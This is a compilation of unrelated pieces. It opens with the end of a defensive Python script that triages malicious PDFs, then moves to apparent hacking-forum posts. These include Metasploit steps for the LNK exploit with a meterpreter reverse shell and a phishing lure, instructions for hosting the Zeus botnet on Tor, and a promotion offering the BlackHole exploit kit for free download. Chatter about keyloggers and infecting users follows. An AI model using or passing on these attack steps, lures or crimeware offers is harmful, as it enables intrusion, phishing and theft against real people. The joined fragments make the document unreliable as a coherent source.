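    """Map object number -> raw body for every 'N 0 obj ... endobj' in the file."""
    return {int(num): body for num, body in OBJ_RE.findall(pdf)}


def decode_stream(body):
    """Return (decoded bytes, list of filters applied), or None if no stream.

    The stream is delimited by the stream/endstream keywords rather than by
    /Length, because a hostile file can misstate /Length."""
    m = STREAM_RE.search(body)
    if m is None:
        return None
    data = m.group(1)
    fm = FILTER_RE.search(body[:m.start()])
    names = re.findall(rb"/(\w+)", fm.group(1)) if fm else []
    applied = []
    for name in names:              # filters are applied in the listed order
        if name not in FILTERS:
            break                   # unknown filter: return what was decoded so far
        data = FILTERS[name](data)
        applied.append(name.decode())
    return data, applied


def triage(pdf):
    """Collect red flags and any script recovered through /JS references."""
    objs = parse_objects(pdf)
    flags, scripts = [], {}
    for num, body in objs.items():
        if b"/OpenAction" in body or b"/AA" in body:
            flags.append("obj %d: auto-run action" % num)
        if re.search(rb"/(JavaScript|JS)\b", body):
            flags.append("obj %d: JavaScript action" % num)
        ref = re.search(rb"/JS\s+(\d+)\s+0\s+R", body)
        if ref:
            target = int(ref.group(1))
            decoded = decode_stream(objs.get(target, b""))
            if decoded:
                script, applied = decoded
                if applied:
                    flags.append("obj %d: script hidden behind %s" % (target, "+".join(applied)))
                scripts[target] = script
    return {"flags": flags, "scripts": scripts}


def make_sample_pdf():
    """Constructed minimal PDF in the layout the article describes: the catalog's
    OpenAction points at a JavaScript action (obj 11) whose /JS is a stream
    (obj 12) wrapped in ASCIIHexDecode. The script is a harmless placeholder."""
    js = b"app.alert('constructed sample');"
    hexed = binascii.hexlify(js) + b">"
    parts = [
        b"%PDF-1.4",
        b"1 0 obj << /Type /Catalog /OpenAction 11 0 R >> endobj",
        b"11 0 obj << /S /JavaScript /JS 12 0 R >> endobj",
        b"12 0 obj << /Length %d /Filter /ASCIIHexDecode >>" % len(hexed),
        b"stream", hexed, b"endstream", b"endobj",
        b"trailer << /Root 1 0 R >>", b"%%EOF",
    ]
    return b"\n".join(parts)


if __name__ == "__main__":
    report = triage(make_sample_pdf())
    for flag in report["flags"]:
        print(flag)
    print(report["scripts"])
```

On real samples expect object streams, encryption and filters this does not handle; treat the combination of an auto-run action, a JavaScript action and an encoded stream as grounds for sandboxed dynamic analysis rather than as proof on its own, which is the same escalation the article follows from the text view to Malzilla and IDA.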
-
Setup Zeus as a hidden service How to setup Zeus 2.0.89 as a hidden service using the tor2web proxy, runing Tor through a logless VPN in Ubuntu 10.10 in a VM. Video: http://vimeo.com/20854260
-
A practical attack - LNK exploit
Notes
1. sudo ./msfconsole
2. use windows/browser/ms10_046_shortcut_icon_dllloader (excellent - Microsoft Windows Shell LNK Code Execution)
3. set SRVHOST 192.168.175.129
4. set Payload windows/meterpreter/reverse_tcp
5. set LHOST 192.168.175.129
6. exploit
7. go to shorturl.com and create a short url for your machine's ip
8. Write an email enticing the recipient to click the link.
9. use meterpreter.
10. pwnage.
Video: http://vimeo.com/16699569
-
BlackHole Exploit Kit 1.0.2
First Public Release of BlackHole Exploit Kit. BlackHole exploit kit is yet another in an ongoing wave of attack toolkits flooding the underground market. The kit first appeared on the crimeware market in September of 2010 and ever since then has quickly been gaining market share over its vast number of competitors. In fact, many antivirus vendors now claim that this is one of the most prevalent exploit kits used in the wild. Even Malware Domain List is showing quite a few domains infected with the BlackHole exploit kit.

Black Market Cost: Users can purchase the annual license for $1500, the semi-annual license for $1000, or just a quarterly license for $700. The license includes free software updates for the duration of the contract. For those malicious users with a commitment phobia the makers of the kit offer yet another solution. You can rent the kit (on the author's servers) for $50 for 24 hours, $200 for 1 week, $300 for 2 weeks, $400 for 3 weeks, and $500 for 4 weeks. A domain name comes included with the rental agreement, but should you desire to change it you need to pay another $35. But now it's FREE HERE!

Feature: One highly touted feature of the BlackHole toolkit is its TDS or Traffic Direction Script. While this is not an entirely new concept in attack toolkits, the TDS included here is much more sophisticated and powerful than those in other kits. A TDS is basically an engine that allows redirection of traffic through a set of rules. For example, a user can set up a set of rules that redirect flow to different landing pages on their domain. These rules could be based on operating system, browser, country of origin, exploit, files, etc. One rule might redirect traffic to page A for all users that are running Windows OS from XP to Vista and running IE 8, while another rule can redirect Windows 7 users to page B. Those were just simple example rules. More advanced rules could set expiration dates for certain payloads and replace them with new ones when the date is reached. The TDS included in BlackHole even goes the extra step and allows you to create traffic flows based on these rules and provides a management interface for the flows. A savvy malicious user with a lot of experience could easily utilize this rule engine to increase their infection numbers.

From a web application standpoint BlackHole is built just like other kits, consisting of a PHP and MySQL backend. Since the majority of web servers run on the LAMP stack this allows for very easy application deployment. The user interface for this kit is a cut above the rest, and it definitely looks nicer than almost any other attack kit we've analyzed. It resembles some of the best legitimate web apps we see in the world of commercial software.

Download Link: http://www.multiupload.com/ZTZPEA9L5Y
Source: BlackHole Exploit Kit 1.0.2 - Download ! ~ THN : The Hackers News
-
Arachni v.0.2.3 - Open Source Web Application Security Scanner Framework

Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications. Arachni is smart: it trains itself by learning from the HTTP responses it receives during the audit process. Unlike other scanners, Arachni takes into account the dynamic nature of web applications and can detect changes caused while travelling through the paths of a web application's cyclomatic complexity. This way attack/input vectors that would otherwise be undetectable by non-humans are seamlessly handled by Arachni.

The main focus of this release has been on distributed deployment and bugfixing. Main additions include the update of the HTML report to include false positive reporting functionality and an updated WebUI with support for multiple Dispatchers.

Full information: https://github.com/Zapotek/arachni/

Source: Arachni v.0.2.3 - Open Source Web Application Security Scanner Framework ~ THN : The Hackers News
-
iAWACS 2011 Forensics challenge

Sunday, May 22, 2011

Hi to all (French version below)

The Forensics challenge for iAWACS 2011 is now open. It is inspired by a real case for which a new information hiding technique has been created. The aim is to test its strength and its security on an almost real implementation (and not under academic conditions).

Tactical scheme: according to some intelligence reports, a terrorist attack against the RSSIL 2011 event has been prepared. A terrorist has been caught by the French police forces while he was about to recover a cell phone hidden in a geocache. Despite the efforts of the Police forensics and technical teams, the analysis of the cell phone has not been successful yet. However, the analysis proved that the Dcim directory contains a hidden secret message. The terrorist confessed that he was waiting for a call on this cell phone to receive instructions about another geocache. This second one contains an SD card with the application to access the secret message. Unfortunately, this call will never happen (newspapers have leaked news of this arrest). So will you be clever and imaginative enough to recover the secret message and prevent the attack against RSSIL 2011?

Here are the conditions for the challenge:
* Opening date: May 22nd, 2011. The file dcim.tgz contains the Camera directory (the phone is a Samsung Galaxy S).
* Award ceremony (if any winner) or technical hints at the RSSIL 2011 event to go on with the challenge.
* End of the challenge: December 31st, 2011.
* The solution must be sent to iawacs@esiea.fr.

Rules of the challenge:
* The prize (5000 euros) will be awarded only to someone able to recover both the message and the hiding mechanism.
* The technical mechanism will not be disclosed by the organizers of the challenge (unless by a potential winner, who is free to publish any information with respect to it). Only the secret message will be published once the challenge is closed.
* Any partial solution, hint or valuable information will be considered for an honor award.

Have a nice challenge and good luck guys!

Source: Operational cryptology and virology lab: iAWACS 2011 Forensics challenge
-
Hello, did you read what I wrote? I was referring to those who added me and didn't even know who I was, or asked me how to set up a Metin server. Where the hell did I say "scum"? On Messenger I said "I had a lot of bums on my list" - so not everyone. And above, "all the losers who added me to their list asked me who I was" - so I was only referring to those who didn't know who I was. Where did you feel lumped in with them? And what is so important about your email? I didn't post a list of all the IDs anywhere; only one loser has it, and he probably doesn't know what to do with it. What moral and financial damage has it caused you that ONE PERSON knows your email? What the hell did he do with it? What's with all this fuss?
-
I prefer beer, it's more natural. I don't even know how long it's been since I last drank Cola/Pepsi. I haven't had a beer since yesterday...
-
So that everyone understands. Some time ago, I used that ID, nytro_rst, to talk with members and for other things that were useful at first. But I kept getting dozens of add requests, which didn't interest me much, and all the losers who added me to their list kept asking me who I was. It was also annoying to keep being asked for Metin accounts, or how to set up a Metin server, password cracking programs or keyloggers and other nonsense. And I quickly came to the conclusion that that ID, on which I think I had gathered 1000 IDs, was useless. I still used it to send a mass message now and then about something related to RST, but likewise useless; I don't think most of them even knew about RST, or at least a good part of them didn't. And I chose a stupid solution, given that I didn't care about that ID: send a mass message with the password, and also post it here, on RST. And that's what I did. One minute after the mass message in which I said what the account's password was, someone had already logged into my account, and after 2 minutes I think the password had already been changed. But I posted here on RST, in Offtopic, where everyone comes to see what's going on, and most understood. And that loser also sent 2-3 such mass messages at first, but I think many made fun of him, and I think I asked him something from another ID and saw that he's not too bright, then he stopped. But it seems he's still trying something. Of course, if you need SMTP or SSH scanners or keyloggers, take them, go ahead, but don't complain that they're infected. PS: Tomorrow I'll analyze that file on Megaupload that he keeps spreading around, to see what it's about.
-
I don't think there's any point; it's been discussed before anyway. How many Linux-related topics have you opened? In how many already open ones have you commented with something useful? Having Linux doesn't mean you'll post something there too.
-
I didn't make it public; only one bum has it, and he doesn't even know how to infect people to get FileList accounts. He doesn't even write as neatly and nicely as I do...
-
I'm NOT that guy. I sent a mass message with the password, then posted it on RST. It seems a loser is trying to infect you. And it seems I'm not stressing about it.